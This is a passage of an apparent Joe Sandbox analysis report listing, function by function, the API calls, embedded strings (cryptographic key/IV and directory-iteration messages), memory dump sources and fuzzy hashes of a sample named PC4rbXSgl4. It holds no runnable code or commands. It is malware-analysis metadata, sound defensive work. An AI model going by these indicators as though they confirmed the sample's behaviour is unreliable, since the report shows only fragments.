                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18ACA80
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                • String ID:
                • API String ID: 3731820665-0
                • Opcode ID: 45afe836d1484c473fe8c5a9915a5dd6fff57a64e50d00aa7835bc0a3bd05c78
                • Instruction ID: d0c2c2351e4e6c1e64abcd2975dac7d70438a74d52a3d159e78f845756f4f99e
                • Opcode Fuzzy Hash: 45afe836d1484c473fe8c5a9915a5dd6fff57a64e50d00aa7835bc0a3bd05c78
                • Instruction Fuzzy Hash: 59514C32619F8686EB00CF65E95026977A5FB49FC8F144035DAAD83BA8EF3DD055C740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_pagememchr
                • String ID: directory_entry::status$recursive_directory_iterator::operator++$recursive_directory_iterator::recursive_directory_iterator
                • API String ID: 670800737-262937757
                • Opcode ID: a63f7b8405fab6a2a466d2b78ec6e475940b6f016301158a6dfb83a781f14d4c
                • Instruction ID: b9496b016f4749d52b545582c6999d18f261d521bad4ea2644c61b8c0c919278
                • Opcode Fuzzy Hash: a63f7b8405fab6a2a466d2b78ec6e475940b6f016301158a6dfb83a781f14d4c
                • Instruction Fuzzy Hash: DBF18172A18B8592DB209F25E5403AD6361FB98BE4F544232DABD837D9EF3DE481C740
                APIs
                • GetLastError.KERNEL32 ref: 00007FF6F18B752C
                • memmove.VCRUNTIME140 ref: 00007FF6F18B75D5
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7720
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190
                  • Part of subcall function 00007FF6F18AE090: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE1C9
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1D3
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1E1
                  • Part of subcall function 00007FF6F18AE090: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AE216
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B775F
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B779E
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B77ED
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B783C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$memmove$Concurrency::cancel_current_taskErrorLast
                • String ID: operation failed with error $OS_Rng:
                • API String ID: 393972192-700108173
                • Opcode ID: 380476296cd9530c4db8c5b9a6a709d5356c7774a83f0d9dcd4de62e77856582
                • Instruction ID: 96ed2ba47e2a8f1a1a199816c4ca30e5e7cc835d8a71208fd80a6f194d0a9e48
                • Opcode Fuzzy Hash: 380476296cd9530c4db8c5b9a6a709d5356c7774a83f0d9dcd4de62e77856582
                • Instruction Fuzzy Hash: F8A17062F24B8685FB00DB64D6403AC2362AB457E8F505236DA7D56BE9EF3CE185C344
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow$memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID: exceeds the maximum of $: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted$: footer length of $: header length of $TruncatedFinal$setting key and IV
                • API String ID: 3618855185-3504708856
                • Opcode ID: 5d7bf8bfa13847f1f92a5224f9899b9c3168d38cc4adde183cc718c5c5e66638
                • Instruction ID: 4632e4dd4a485f4c1af4e60f492fb863b520742a5da63d53d3de6dc1e84f04fa
                • Opcode Fuzzy Hash: 5d7bf8bfa13847f1f92a5224f9899b9c3168d38cc4adde183cc718c5c5e66638
                • Instruction Fuzzy Hash: 10517E62729A82A6EB01DB65D9501EEB331FF86BC4F404036DA6D977D6EF2CD609C340
                APIs
                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18AA27E), ref: 00007FF6F18AC134
                Strings
                • AllocatorBase: requested size would cause integer overflow, xrefs: 00007FF6F18AC144
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: terminate
                • String ID: AllocatorBase: requested size would cause integer overflow
                • API String ID: 1821763600-10355266
                • Opcode ID: e99cbac41870e0d777e51a1f9950d5bd21e2b9fc287f83b06bdae4cd738dfc70
                • Instruction ID: 390550c777ca7dac5cb46b6276ac66601d7aac21cfc9cf71cc6b3f9849e1a0e8
                • Opcode Fuzzy Hash: e99cbac41870e0d777e51a1f9950d5bd21e2b9fc287f83b06bdae4cd738dfc70
                • Instruction Fuzzy Hash: 1341EB65B2564A66EF146B3ADA452691651BF14FF8F284730EE3C877C1FF2CE4418340
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: CounterErrorExceptionLastPerformanceQueryThrow
                • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                • API String ID: 945393631-2136607233
                • Opcode ID: 663ad1c23c2d792f350d154cde0a8e820dfe97cd782518160897b033cab290f2
                • Instruction ID: 9e30f9d0e6193dc6c749973925673b14bc6ff6374ffe7cdd0f6dcd01b2878bd4
                • Opcode Fuzzy Hash: 663ad1c23c2d792f350d154cde0a8e820dfe97cd782518160897b033cab290f2
                • Instruction Fuzzy Hash: DD411321B28A8292EB20DB64E9513AA37A1FF557C0F800236D57DC36E5FF2CE605CB00
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$_errno_invalid_parameter_noinfomemset
                • String ID:
                • API String ID: 3255005035-0
                • Opcode ID: 1fb40f9f67f319051a0a6c106a665e4aef6422a83c291834087031b2757cb5d0
                • Instruction ID: dc0001f3066eb6da6bc25a62e80ec1a5226693ac362270b8b74a8a285ba04d6d
                • Opcode Fuzzy Hash: 1fb40f9f67f319051a0a6c106a665e4aef6422a83c291834087031b2757cb5d0
                • Instruction Fuzzy Hash: E131A225A28B8286EB249F51E6442AD7660FF44BC4F584531DF7E977D5EF3CE0418200
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                • String ID: $ is not a valid number of rounds
                • API String ID: 15630516-2343365793
                • Opcode ID: 4af4fcc90dbbda8c25941f010ed61ca7b1c6b883cbeb2d123def4072ba69ca0c
                • Instruction ID: fc411455a320d61931a106b2aa96ad2874b08be56d131fa4e3bb6b4ca9962899
                • Opcode Fuzzy Hash: 4af4fcc90dbbda8c25941f010ed61ca7b1c6b883cbeb2d123def4072ba69ca0c
                • Instruction Fuzzy Hash: D971A162F24B4685EB10DBA4E6403AC2361AB457E8F504332EA7D97BD9EF3CE195C340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 7d41cc51b87d472c9aa4cbc491a93cd1d62f8e16b4d85db83cf685f563a9f465
                • Instruction ID: d790fa86c72ba5adcc8183ed6f253e32a65312f2f87818f620818c972348dfb6
                • Opcode Fuzzy Hash: 7d41cc51b87d472c9aa4cbc491a93cd1d62f8e16b4d85db83cf685f563a9f465
                • Instruction Fuzzy Hash: 246190B6B28B4682EF209F55D640AAC27A1FB48BC4F554232DE7E83794EF7DD4468340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                • String ID:
                • API String ID: 1282081513-0
                • Opcode ID: 2eb2f6916b0c9afaf369dda152c728c18e197862635175937170c0791f0a97f3
                • Instruction ID: e4663460abdf044a7589f8e6dce45c0f40ce06c813629fa7f2660bb816dfd6e3
                • Opcode Fuzzy Hash: 2eb2f6916b0c9afaf369dda152c728c18e197862635175937170c0791f0a97f3
                • Instruction Fuzzy Hash: 7551EB62B28A85A6EF00DB59E6042B86751EB44BE0F490635DF7E977D5EF3CE041C304
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA76
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA8B
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA9B
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADACF
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAD9
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAE9
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAF9
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ADB2B
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: c0b3a3c19648aadab42d74ad95ea230f62191146faed820b273ffe8d3855b996
                • Instruction ID: f5643d6126ebecf80a1550f0d3ff4a810eac60ebb486a3637b6e1918f512e660
                • Opcode Fuzzy Hash: c0b3a3c19648aadab42d74ad95ea230f62191146faed820b273ffe8d3855b996
                • Instruction Fuzzy Hash: 0841BF62729B8192EB209B1AE6542AD6361FB44BD4F544332DF7E87BC5EF3CE5418340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 99a5012e49e95a5b35b302f22fc3811f145f8394952177a1b6f26074bbe6f85e
                • Instruction ID: 2bba68f701fe3878f663889fcd04fa9ad405e65667089956ffe5beb2f366d48c
                • Opcode Fuzzy Hash: 99a5012e49e95a5b35b302f22fc3811f145f8394952177a1b6f26074bbe6f85e
                • Instruction Fuzzy Hash: 3E5190B6A28A4681DB148B65E2906BC6761FB64BC4F440232EF7E937D5EF3DD491C340
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E1C
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E33
                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E48
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E60
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E79
                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E87
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8EEB
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18C8EF2
                  • Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                • String ID:
                • API String ID: 1282081513-0
                • Opcode ID: 105fb416d79b28d24ce52af3bfa807c9207d46460f8b326935d67bea50a9be05
                • Instruction ID: 47215272e8f8ae120cbeb8c8c06b6d0c0583d0bddfa918b22950e0cd74ad4d09
                • Opcode Fuzzy Hash: 105fb416d79b28d24ce52af3bfa807c9207d46460f8b326935d67bea50a9be05
                • Instruction Fuzzy Hash: 7F51D161B29A8552EF109B6AE6402BC6750EB46BE0F540B35EB7D9BBD5EF3CE1418300
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C2D
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C44
                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C59
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C71
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C8A
                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C98
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8CFC
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18C8D03
                  • Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                • String ID:
                • API String ID: 1282081513-0
                • Opcode ID: 5ca807be59a0d9650f7fb9d3c3f4d27369bb61caccbf921b31216826a251d858
                • Instruction ID: ba70da2779d5b252b44c336d1365b0e11ef9e5a7ade61b4a03fd31b65779ce29
                • Opcode Fuzzy Hash: 5ca807be59a0d9650f7fb9d3c3f4d27369bb61caccbf921b31216826a251d858
                • Instruction Fuzzy Hash: 22510271B29A8195EF149B6AE6002BC6750EB46BE0F540B35EB7C97BC9EF3CE1418300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 1fcf096b4714ee3a74191cd8aa9985451d0937fbf72f992208c08f3723d4ba83
                • Instruction ID: accf2378ef901f539f3a0c792f718bf4ed31c4b98e951fbee78629263a7dfdee
                • Opcode Fuzzy Hash: 1fcf096b4714ee3a74191cd8aa9985451d0937fbf72f992208c08f3723d4ba83
